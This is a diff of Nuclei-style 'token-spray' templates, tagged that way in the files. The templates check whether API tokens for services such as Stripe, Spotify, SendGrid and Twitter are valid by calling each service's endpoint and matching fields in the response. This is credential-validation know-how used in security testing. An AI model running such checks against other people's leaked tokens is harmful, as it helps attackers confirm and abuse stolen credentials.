words:
|
||||
- '"ID":'
|
||||
- '"Name":'
|
||||
- '"ApiTokens":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-sendgrid
|
|||
info:
|
||||
name: Sendgrid API Test
|
||||
author: zzeitlin
|
||||
reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp
|
||||
severity: info
|
||||
reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp
|
||||
tags: token-spray,sendgrid
|
||||
|
||||
self-contained: true
|
|
@ -19,5 +19,7 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'error'
|
||||
negative: true
|
||||
- '"url":'
|
||||
- '"team_id":'
|
||||
- '"user_id":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-sonarcloud
|
|||
info:
|
||||
name: SonarCloud API Test
|
||||
author: zzeitlin
|
||||
reference: https://sonarcloud.io/web_api/api/authentication
|
||||
severity: info
|
||||
reference: https://sonarcloud.io/web_api/api/authentication
|
||||
tags: token-spray,sonarcloud
|
||||
|
||||
self-contained: true
|
||||
|
@ -19,4 +19,4 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'true'
|
||||
- '{"valid": true}'
|
|
@ -3,19 +3,23 @@ id: api-spotify
|
|||
info:
|
||||
name: Spotify API Test
|
||||
author: zzeitlin
|
||||
reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/
|
||||
severity: info
|
||||
reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/
|
||||
tags: token-spray,spotify
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "https://api.spotify.com/v1/me"
|
||||
- "https://api.spotify.com/v1/me/player/devices"
|
||||
headers:
|
||||
Authorization: Bearer {{token}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"devices":'
|
||||
- '"id":'
|
||||
- '"is_active":'
|
||||
condition: and
|
|
@ -19,5 +19,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Authorization Error"
|
||||
negative: true
|
||||
- '"id"'
|
||||
- '"username"'
|
||||
condition: and
|
||||
|
|
|
@ -3,8 +3,8 @@ id: api-stripe
|
|||
info:
|
||||
name: Stripe API Test
|
||||
author: zzeitlin
|
||||
reference: https://stripe.com/docs/api/authentication
|
||||
severity: info
|
||||
reference: https://stripe.com/docs/api/authentication
|
||||
tags: token-spray,stripe
|
||||
|
||||
self-contained: true
|
||||
|
@ -16,6 +16,10 @@ requests:
|
|||
Authorization: Basic {{base64(token + ':')}}
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"object":'
|
||||
- '"url":'
|
||||
- '"data":'
|
||||
condition: and
|
|
@ -19,5 +19,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "token_not_valid"
|
||||
negative: true
|
||||
- '"auth_code":'
|
||||
- '"state":'
|
||||
condition: and
|
||||
|
|
|
@ -21,7 +21,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'id":'
|
||||
- 'image_id":'
|
||||
- 'sub_id":'
|
||||
condition: and
|
||||
- '"country_code":'
|
||||
- '"created_at":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-travisci
|
|||
info:
|
||||
name: Travis CI API Test
|
||||
author: zzeitlin
|
||||
reference: https://developer.travis-ci.com/
|
||||
severity: info
|
||||
reference: https://developer.travis-ci.com/
|
||||
tags: token-spray,travis
|
||||
|
||||
self-contained: true
|
|
@ -3,8 +3,8 @@ id: api-twitter
|
|||
info:
|
||||
name: Twitter API Test
|
||||
author: zzeitlin
|
||||
reference: https://developer.twitter.com/en/docs/twitter-api/api-reference-index
|
||||
severity: info
|
||||
reference: https://developer.twitter.com/en/docs/twitter-api/api-reference-index
|
||||
tags: token-spray,twitter
|
||||
|
||||
self-contained: true
|
||||
|
@ -19,5 +19,6 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'error'
|
||||
negative: true
|
||||
- '"account_name":'
|
||||
- '"subscriptions_count_all":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-visualstudio
|
|||
info:
|
||||
name: Visual Studio API Test
|
||||
author: zzeitlin
|
||||
reference: https://openapi.appcenter.ms/
|
||||
severity: info
|
||||
reference: https://openapi.appcenter.ms/
|
||||
tags: token-spray,visualstudio,microsoft
|
||||
|
||||
self-contained: true
|
||||
|
@ -19,6 +19,8 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
negative: true
|
||||
words:
|
||||
- 'Unauthorized'
|
||||
- '"id":'
|
||||
- '"description":'
|
||||
- '"owner":'
|
||||
condition: and
|
|
@ -3,8 +3,8 @@ id: api-wakatime
|
|||
info:
|
||||
name: WakaTime CI API Test
|
||||
author: zzeitlin
|
||||
reference: https://wakatime.com/developers
|
||||
severity: info
|
||||
reference: https://wakatime.com/developers
|
||||
tags: token-spray,wakatime
|
||||
|
||||
self-contained: true
|
||||
|
@ -14,7 +14,10 @@ requests:
|
|||
- "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}"
|
||||
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 401
|
||||
negative: true
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"data":'
|
||||
- '"seconds":'
|
||||
- '"is_up_to_date":'
|
||||
condition: and
|
|
@ -19,5 +19,7 @@ requests:
|
|||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "errors"
|
||||
negative: true
|
||||
- 'id'
|
||||
- 'title'
|
||||
- 'type'
|
||||
condition: and
|
||||
|
|
|
@ -13,13 +13,10 @@ requests:
|
|||
path:
|
||||
- "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'quotaExceeded'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- '"kind":'
|
||||
- '"pageInfo":'
|
||||
condition: and
|
|
@ -1,4 +1,4 @@
|
|||
id: api-googlespeedlimit
|
||||
id: api-google-place-details
|
||||
|
||||
info:
|
||||
name: Google Place Details API Test
|
||||
|
|
Loading…
Reference in New Issue